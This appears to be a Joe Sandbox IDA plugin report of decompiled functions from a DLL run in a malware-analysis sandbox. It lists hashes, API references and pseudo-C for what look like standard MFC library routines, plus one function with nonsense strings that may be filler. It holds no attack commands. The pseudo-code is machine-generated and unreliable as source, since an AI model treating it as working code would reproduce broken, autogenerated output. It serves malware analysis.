Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction ID: 6908282d98887baf5b1b11d67664c0e969dcc26382147783454bf2a56fb15221
Opcode Fuzzy Hash: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction Fuzzy Hash: DF11E376D00159FBDB21DB9ACD89CDFFFBCEF89750B1040AAB600A6122D2709A41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 100021CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrencyFormatW.KERNEL32 ref: 100021FF
GetCurrencyFormatW.KERNEL32 ref: 10002222
GetCurrencyFormatW.KERNEL32 ref: 10002238
GetCurrencyFormatW.KERNEL32 ref: 1000225F

Strings

xadqsavcbdfewescGADW, xrefs: 100021DE, 100021EC, 10002211, 10002254
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100021DF, 100021F2, 100021F7, 10002217, 1000225B

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction ID: 4ec50c83481157a01d9dbb3de4afa19c59092b64c33b3db984519a0354e02278
Opcode Fuzzy Hash: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction Fuzzy Hash: 18115176604225BFE201DB85DD81E96B7DCEF4A784F024046FF44EB2A1C721BC548EA5

Uniqueness

Uniqueness Score: -1.00%

Function 100109B6 Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100109B6(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E100209E8(0, 0);
				_t22 = E100010C9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E10004E3A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10020F40(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1001FC9C(_t28);
			}

0x100109b6
0x100109b6
0x100109b6
0x100109bd
0x100109c7
0x100109d3
0x100109d9
0x100109de
0x100109e4
0x100109e6
0x100109eb
0x100109f1
0x100109f1
0x100109f9
0x10010a0a
0x10010a16
0x10010a1b
0x10010a21
0x10010a24
0x10010a29
0x10010a33
0x10010a33
0x10010a36
0x10010a3c
0x10010a47

APIs

LeaveCriticalSection.KERNEL32(?), ref: 100109BD
__CxxThrowException@8.LIBCMT ref: 100109C7

Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6), ref: 100109DE
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB

Part of subcall function 10004E3A: __CxxThrowException@8.LIBCMT ref: 10004E4E

_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction ID: 46b5b42a71e0509a224d2307cf2bd15c4222dc2e63f5f7ecafe87185b2be41b2
Opcode Fuzzy Hash: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction Fuzzy Hash: CC117C74100605AFE721EF60CC8AC6BBBA5FF08354B50C129F9869A567CB71ED90CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10010DB4 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DB4(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x10010dbe
0x10010dc4
0x10010dcb
0x10010dd2
0x10010dd9
0x10010de6
0x10010ded
0x10010df0
0x10010df3
0x10010df7

APIs

GetSysColor.USER32(0000000F), ref: 10010DC0
GetSysColor.USER32(00000010), ref: 10010DC7
GetSysColor.USER32(00000014), ref: 10010DCE
GetSysColor.USER32(00000012), ref: 10010DD5
GetSysColor.USER32(00000006), ref: 10010DDC
GetSysColorBrush.USER32(0000000F), ref: 10010DE9
GetSysColorBrush.USER32(00000006), ref: 10010DF0

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction ID: d7120ba38cccac322e287d397fd1090e884fedfb1f22003e23e449693bce91bf
Opcode Fuzzy Hash: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction Fuzzy Hash: 4DF0F8719407489BE730BB728D49B47BAE1EFC4B10F02092AD2818BA91E6B6E0409F40

Uniqueness

Uniqueness Score: -1.00%

Function 10034F96 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10034F96() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x10048874 =  *0x10048874 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x10048874 = _t6;
					return _t6;
				}
			}

0x10034fa7
0x10034fb1
0x10034fb5
0x10034fd1
0x10034fd1
0x00000000
0x10034fd1
0x10034fb7
0x10034fbd
0x00000000
0x00000000
0x00000000
0x10034fbf
0x10034fbf
0x10034fc4
0x10034fca
0x00000000
0x10034fca

APIs

GetVersion.KERNEL32 ref: 10034F9E
GetVersion.KERNEL32 ref: 10034FA9
GetVersion.KERNEL32 ref: 10034FB1
GetVersion.KERNEL32 ref: 10034FB7
RegisterClipboardFormatA.USER32 ref: 10034FC4

Strings

MSWHEEL_ROLLMSG, xrefs: 10034FBF

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
Instruction ID: 0d45b66faa2ad64bfbc903d79e921ae9fe2923187844060e47b6127ebb4b5c7f
Opcode Fuzzy Hash: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
Instruction Fuzzy Hash: 78E0863EC001334EE743B7749F4035D66E4CB4A2D2F6B403AD9018F555DE2459438BB5

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5EB Relevance: 9.1, APIs: 6, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001D5EB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x10045580; // 0xe155dca3
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10020F40(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001056A(_t74, 0x10038ea0);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001056A(_t74, 0x10036ce4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1001FBB5(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

0x1001d5eb
0x1001d5ec
0x1001d5f9
0x1001d600
0x1001d607
0x1001d60e
0x1001d614
0x1001d61a
0x1001d62c
0x1001d62f
0x1001d636
0x1001d63c
0x1001d6a6
0x1001d6a8
0x1001d6ad
0x1001d6af
0x1001d6b7
0x1001d6b8
0x1001d6cb
0x1001d6d0
0x1001d6d5
0x1001d6ba
0x1001d6ba
0x1001d6bf
0x1001d6c4
0x1001d6c4
0x1001d63e
0x1001d641
0x1001d648
0x1001d64e
0x1001d654
0x1001d657
0x1001d65a
0x1001d65e
0x1001d673
0x1001d676
0x1001d676
0x1001d67b
0x1001d67e
0x1001d682
0x1001d697
0x1001d69a
0x1001d69a
0x1001d682
0x1001d6ef
0x1001d6f2
0x1001d6f9
0x1001d6fc
0x1001d718
0x1001d71b
0x1001d71b
0x1001d723
0x1001d725
0x1001d728
0x1001d747
0x1001d74a
0x1001d74a
0x1001d728
0x1001d755
0x1001d756
0x1001d759
0x1001d766

APIs

_memset.LIBCMT ref: 1001D61A
SysAllocString.OLEAUT32(00000000), ref: 1001D66B
SysAllocString.OLEAUT32(00000000), ref: 1001D68F

Part of subcall function 1000567F: __EH_prolog3.LIBCMT ref: 10005686

SysAllocString.OLEAUT32(00000000), ref: 1001D6E7
SysAllocString.OLEAUT32(00000000), ref: 1001D710
SysAllocString.OLEAUT32(00000000), ref: 1001D73F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction ID: 6e1135c887c9357414f922cece5f9f8fee59e25652f77c4319450727ae6b76bc
Opcode Fuzzy Hash: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction Fuzzy Hash: 00415E34900208CFDB24EFB8D881A9EB7B1FF54354F10852EF5A69B2A6DB71A854CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000772D Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000772D(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10045580; // 0xe155dca3
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000764E(0);
				_t67 = _t72;
				_t63 = E10007682(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100075B7(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000764E(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1001FBB5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x1000772d
0x1000772e
0x1000773b
0x10007742
0x10007751
0x10007757
0x1000775a
0x1000775d
0x10007762
0x1000776d
0x10007772
0x10007775
0x1000777a
0x1000777a
0x10007780
0x10007788
0x10007790
0x100077b5
0x100077b5
0x100077b7
0x100077b9
0x100077b9
0x00000000
0x1000779d
0x100077a7
0x100077af
0x00000000
0x100077b1
0x100077b1
0x100077bc
0x100077bc
0x100077c2
0x100077c6
0x100077c9
0x100077d1
0x100077d8
0x100077d8
0x100077d1
0x100077e1
0x100077e9
0x100077ef
0x10007802
0x10007802
0x10007802
0x100077f1
0x100077f7
0x100077f9
0x100077f9
0x100077f7
0x100077ef
0x10007809
0x1000780b
0x1000780f
0x10007816
0x10007819
0x1000782a
0x1000782c
0x1000782e
0x1000782e
0x10007811
0x10007811
0x10007811
0x10007835
0x1000783b
0x1000783c
0x1000783f
0x1000784c
0x1000784e
0x10007853
0x10007853
0x10007859
0x10007860
0x10007860
0x10007868
0x10007876
0x10007877
0x1000787a
0x10007887
0x10007887
0x100077af

APIs

Part of subcall function 10007682: GetParent.USER32(?), ref: 100076D5
Part of subcall function 10007682: GetLastActivePopup.USER32(?), ref: 100076E4
Part of subcall function 10007682: IsWindowEnabled.USER32(?), ref: 100076F9
Part of subcall function 10007682: EnableWindow.USER32(?,00000000), ref: 1000770C

EnableWindow.USER32(?,00000001), ref: 1000777A
GetWindowThreadProcessId.USER32(?,?), ref: 10007788
GetCurrentProcessId.KERNEL32(?,?), ref: 10007792
SendMessageA.USER32 ref: 100077A7
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 10007824
EnableWindow.USER32(?,00000001), ref: 10007860

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction ID: bdb92c1df6b4a8dc20cb8eb5586ece2812bcce3fef41ea9017e6a72a13aca31b
Opcode Fuzzy Hash: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction Fuzzy Hash: DB417B32E002589FFB31CF74CC89B9D77A8FF05280F214119E95D9B286EB799944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007682 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007682(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100075AB();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10005CAE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1000768a
0x10007692
0x10007694
0x100076b1
0x100076bf
0x100076ca
0x100076cc
0x100076ce
0x100076d0
0x100076db
0x100076dd
0x100076ea
0x100076ea
0x100076ec
0x100076f2
0x100076f6
0x10007714
0x10007707
0x1000770a
0x1000770c
0x1000770c
0x100076f6
0x1000771d
0x00000000
0x00000000
0x00000000
0x100076d2
0x100076d2
0x100076d3
0x100076d5
0x100076d7
0x00000000
0x100076d2
0x100076c4
0x100076c6
0x100076c8
0x00000000
0x00000000
0x00000000
0x100076c8
0x10007696
0x1000769d
0x100076ac
0x100076ac
0x00000000
0x100076ac
0x1000769f
0x100076a6
0x00000000
0x00000000
0x100076a8
0x00000000

APIs

GetWindowLongA.USER32 ref: 100076B4
GetParent.USER32(?), ref: 100076C2
GetParent.USER32(?), ref: 100076D5
GetLastActivePopup.USER32(?), ref: 100076E4
IsWindowEnabled.USER32(?), ref: 100076F9
EnableWindow.USER32(?,00000000), ref: 1000770C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
